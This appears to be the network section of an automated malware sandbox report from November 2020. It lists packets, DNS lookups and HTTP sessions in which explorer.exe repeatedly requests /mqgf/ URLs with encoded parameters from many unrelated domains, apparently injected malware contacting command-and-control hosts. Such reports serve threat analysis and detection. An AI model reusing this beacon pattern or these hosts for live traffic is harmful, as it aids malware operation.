                                                                                                                                  Nov 26, 2020 15:09:05.652481079 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.652625084 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.652915001 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.669075966 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767719984 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767754078 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767883062 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.767950058 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.785839081 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:10.998608112 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.026669025 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:11.026842117 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.027050972 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.054827929 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:11.522761106 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.589823961 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.298913956 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.299211025 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:13.315665007 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.315711975 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.315924883 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:13.316107035 CET4977280192.168.2.4165.227.229.15

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 26, 2020 15:07:13.144359112 CET5299153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:13.171447039 CET53529918.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:14.239559889 CET5370053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:14.266622066 CET53537008.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:21.541554928 CET5172653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:21.587124109 CET53517268.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:22.348275900 CET5679453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:22.375363111 CET53567948.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:26.132932901 CET5653453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:26.160192966 CET53565348.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:26.973536015 CET5662753192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:27.000674963 CET53566278.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:27.773952007 CET5662153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:27.800987005 CET53566218.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:28.831362963 CET6311653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:28.876629114 CET53631168.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:30.165488005 CET6407853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:30.192444086 CET53640788.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:30.963388920 CET6480153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:30.990685940 CET53648018.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:31.495783091 CET6172153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:31.522849083 CET53617218.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:31.801719904 CET5125553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:31.828955889 CET53512558.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:32.467648983 CET6152253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:32.494673014 CET53615228.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:40.357604027 CET5233753192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:40.384687901 CET53523378.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:42.293867111 CET5504653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:42.320950031 CET53550468.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:49.923564911 CET4961253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:49.950719118 CET53496128.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:51.235740900 CET4928553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:51.281332016 CET53492858.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:51.810421944 CET5060153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:51.855747938 CET53506018.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:52.990712881 CET6087553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:53.036309004 CET53608758.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:53.056974888 CET5644853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:53.084016085 CET53564488.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:53.981822014 CET5917253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:54.028368950 CET53591728.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:54.887774944 CET6242053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:54.914705038 CET53624208.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:55.792689085 CET6057953192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:55.837688923 CET53605798.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:56.405735016 CET5018353192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:56.450957060 CET53501838.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:57.158721924 CET6153153192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:57.204114914 CET53615318.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:57.212976933 CET4922853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:57.258393049 CET53492288.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:57.801665068 CET5979453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:57.828541994 CET53597948.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:07:58.288177013 CET5591653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:07:58.333524942 CET53559168.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:09.319849968 CET5275253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:09.346962929 CET53527528.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:09.402966022 CET6054253192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:09.430198908 CET53605428.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.667031050 CET6068953192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET53606898.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.776492119 CET6420653192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET53642068.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:33.867263079 CET5090453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:33.917606115 CET53509048.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:38.957355022 CET5752553192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:39.006593943 CET53575258.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.277055979 CET5381453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:44.338299990 CET53538148.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.482791901 CET5341853192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:49.533351898 CET53534188.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:54.903394938 CET6283353192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:08:54.973221064 CET53628338.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.259206057 CET5926053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:00.309253931 CET53592608.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.562294960 CET4994453192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:05.633838892 CET53499448.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:10.801733971 CET6330053192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:10.996421099 CET53633008.8.8.8192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:16.539433002 CET6144953192.168.2.48.8.8.8
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET53614498.8.8.8192.168.2.4

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Nov 26, 2020 15:08:23.667031050 CET192.168.2.48.8.8.80xa1d5Standard query (0)www.carnesveymacr.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:28.776492119 CET192.168.2.48.8.8.80x3f4bStandard query (0)www.mehler.photographyA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:33.867263079 CET192.168.2.48.8.8.80xb2aStandard query (0)www.uyieoamejus2zd.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:38.957355022 CET192.168.2.48.8.8.80xef12Standard query (0)www.thelonerangernews.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:44.277055979 CET192.168.2.48.8.8.80xeae2Standard query (0)www.hvcharging.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:49.482791901 CET192.168.2.48.8.8.80x2278Standard query (0)www.jddq888.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:54.903394938 CET192.168.2.48.8.8.80x2c83Standard query (0)www.wtmailer15.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:00.259206057 CET192.168.2.48.8.8.80x8642Standard query (0)www.wastie.clubA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:05.562294960 CET192.168.2.48.8.8.80x460cStandard query (0)www.gettingthehelloutofca.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:10.801733971 CET192.168.2.48.8.8.80x26fcStandard query (0)www.caelaabadie.comA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.539433002 CET192.168.2.48.8.8.80xc857Standard query (0)www.mapnimbis.comA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET8.8.8.8192.168.2.40xa1d5No error (0)www.carnesveymacr.comcarnesveymacr.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET8.8.8.8192.168.2.40xa1d5No error (0)carnesveymacr.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:23.724678993 CET8.8.8.8192.168.2.40xa1d5No error (0)carnesveymacr.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET8.8.8.8192.168.2.40x3f4bNo error (0)www.mehler.photographymehler.photographyCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET8.8.8.8192.168.2.40x3f4bNo error (0)mehler.photography192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET8.8.8.8192.168.2.40x3f4bNo error (0)mehler.photography192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:33.917606115 CET8.8.8.8192.168.2.40xb2aName error (3)www.uyieoamejus2zd.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:39.006593943 CET8.8.8.8192.168.2.40xef12No error (0)www.thelonerangernews.comthelonerangernews.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:39.006593943 CET8.8.8.8192.168.2.40xef12No error (0)thelonerangernews.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:44.338299990 CET8.8.8.8192.168.2.40xeae2No error (0)www.hvcharging.comhvcharging.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:44.338299990 CET8.8.8.8192.168.2.40xeae2No error (0)hvcharging.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:49.533351898 CET8.8.8.8192.168.2.40x2278No error (0)www.jddq888.comjddq888.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:49.533351898 CET8.8.8.8192.168.2.40x2278No error (0)jddq888.com23.88.85.105A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:54.973221064 CET8.8.8.8192.168.2.40x2c83No error (0)www.wtmailer15.com75.126.100.11A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:00.309253931 CET8.8.8.8192.168.2.40x8642No error (0)www.wastie.clubwastie.clubCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:00.309253931 CET8.8.8.8192.168.2.40x8642No error (0)wastie.club95.215.210.10A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:05.633838892 CET8.8.8.8192.168.2.40x460cNo error (0)www.gettingthehelloutofca.comgettingthehelloutofca.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:05.633838892 CET8.8.8.8192.168.2.40x460cNo error (0)gettingthehelloutofca.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:10.996421099 CET8.8.8.8192.168.2.40x26fcNo error (0)www.caelaabadie.comcaelaabadie.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:10.996421099 CET8.8.8.8192.168.2.40x26fcNo error (0)caelaabadie.com165.227.229.15A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.33.2.79A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com198.58.118.167A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.33.23.183A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com96.126.123.244A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.56.79.23A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.79.19.196A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • www.carnesveymacr.com
                                                                                                                                  • www.mehler.photography
                                                                                                                                  • www.thelonerangernews.com
                                                                                                                                  • www.hvcharging.com
                                                                                                                                  • www.jddq888.com
                                                                                                                                  • www.wtmailer15.com
                                                                                                                                  • www.wastie.club
                                                                                                                                  • www.gettingthehelloutofca.com
                                                                                                                                  • www.caelaabadie.com

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.449764192.0.78.2480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:23.752765894 CET1403OUTGET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.carnesveymacr.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:23.769018888 CET1403INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 162
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0
                                                                                                                                  X-ac: 2.hhn _dfw
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.449765192.0.78.2480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:28.844275951 CET1404OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1
                                                                                                                                  Host: www.mehler.photography
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:28.860582113 CET1405INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 162
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS
                                                                                                                                  X-ac: 2.hhn _dfw
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.44976634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:39.024245024 CET1406OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1
                                                                                                                                  Host: www.thelonerangernews.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:39.139292955 CET1406INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fbfb454-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.44976734.102.136.18080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:44.356384993 CET1409OUTGET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.hvcharging.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:44.471837997 CET1409INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:44 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fb7c734-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.44976823.88.85.10580C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:49.702579021 CET1410OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1
                                                                                                                                  Host: www.jddq888.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:49.871308088 CET1410INHTTP/1.1 500 Internal Server Error
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:46 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 57
                                                                                                                                  Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82
                                                                                                                                  Data Ascii:


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.44976975.126.100.1180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:55.111057997 CET1411OUTGET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.wtmailer15.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:55.246997118 CET1412INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:55 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
